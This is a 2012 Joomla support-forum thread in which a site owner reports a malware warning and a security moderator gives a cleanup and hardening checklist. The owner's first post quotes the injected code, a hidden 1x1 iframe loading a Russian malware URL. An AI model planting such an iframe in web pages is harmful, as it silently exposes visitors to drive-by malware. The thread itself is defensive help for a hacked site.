The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 4 posts ] 
Author Message
 Post subject: Malware detected
PostPosted: Sun Jun 03, 2012 2:12 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sun Jun 03, 2012 1:57 pm
Posts: 2
I have a site in Joomla 1.6(?) http://www. juventude deangola .com and in Firefox it detected has having malware on it.
The code they say it might have is this one:
<iframe src="http://imt1.ru/l/" width="1" height="1" frameborder="0">

I'm new in joomla so what can i do ?
It apears on several news that i have there so i assume its something with the news mode.

Best Regards


Last edited by PhilD on Sun Jun 03, 2012 4:39 pm, edited 1 time in total.
Broke website link to hacked website


Top
 Profile  
 
 Post subject: Re: Malware detected
PostPosted: Sun Jun 03, 2012 4:52 pm 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2722
Location: Wisconsin USA
According to http://sitecheck.sucuri.net/results/www ... ngola.com/ the website is heavily hacked and is also being blacklisted by Google. This means it has been hacked for some time.

What version of Joomla are you actually using? Stated version and possible discovered version is different, but taht could be the script they use reporting the wrong version of Joomla.

Joomla 1.6 is insecure and also end of life/no longer supported. FYI Joomla 1.5.14 is insecure and out of date also.

This may be a little weird sounding but... I would suggest that you first update/migrate the site to 2.5 and then follow what I am going to post below. Reasoning for this is availability of a known clean set of full install files for 2.6 is no longer easily available. At least Not from the original source.

PhilD wrote:

Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.


You must state what version of Joomla you were using when when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the security Checklist 7 link below.

Note: The forum post tool will work with all versions of Joomla.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


Top
 Profile  
 
 Post subject: Re: Malware detected
PostPosted: Sun Jun 03, 2012 5:27 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sun Jun 03, 2012 1:57 pm
Posts: 2
Thanks for the reply.
I would update to 2.5 but that i will have to pass to another person because i dont know how to update without messing the settings.
I guess almost all the code have to be redone again to maintain the site, and thats a big problem.

Best Regards

PhilD wrote:
According to http://sitecheck.sucuri.net/results/www ... ngola.com/ the website is heavily hacked and is also being blacklisted by Google. This means it has been hacked for some time.

What version of Joomla are you actually using? Stated version and possible discovered version is different, but taht could be the script they use reporting the wrong version of Joomla.

Joomla 1.6 is insecure and also end of life/no longer supported. FYI Joomla 1.5.14 is insecure and out of date also.

This may be a little weird sounding but... I would suggest that you first update/migrate the site to 2.5 and then follow what I am going to post below. Reasoning for this is availability of a known clean set of full install files for 2.6 is no longer easily available. At least Not from the original source.

PhilD wrote:

Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.


You must state what version of Joomla you were using when when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the security Checklist 7 link below.

Note: The forum post tool will work with all versions of Joomla.


Top
 Profile  
 
 Post subject: Re: Malware detected
PostPosted: Sun Jun 03, 2012 7:00 pm 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2722
Location: Wisconsin USA
See the links here on this page on how to update:
http://www.joomla.org/download.html

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 4 posts ] 



Who is online

Users browsing this forum: AdsBot [Google] and 21 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group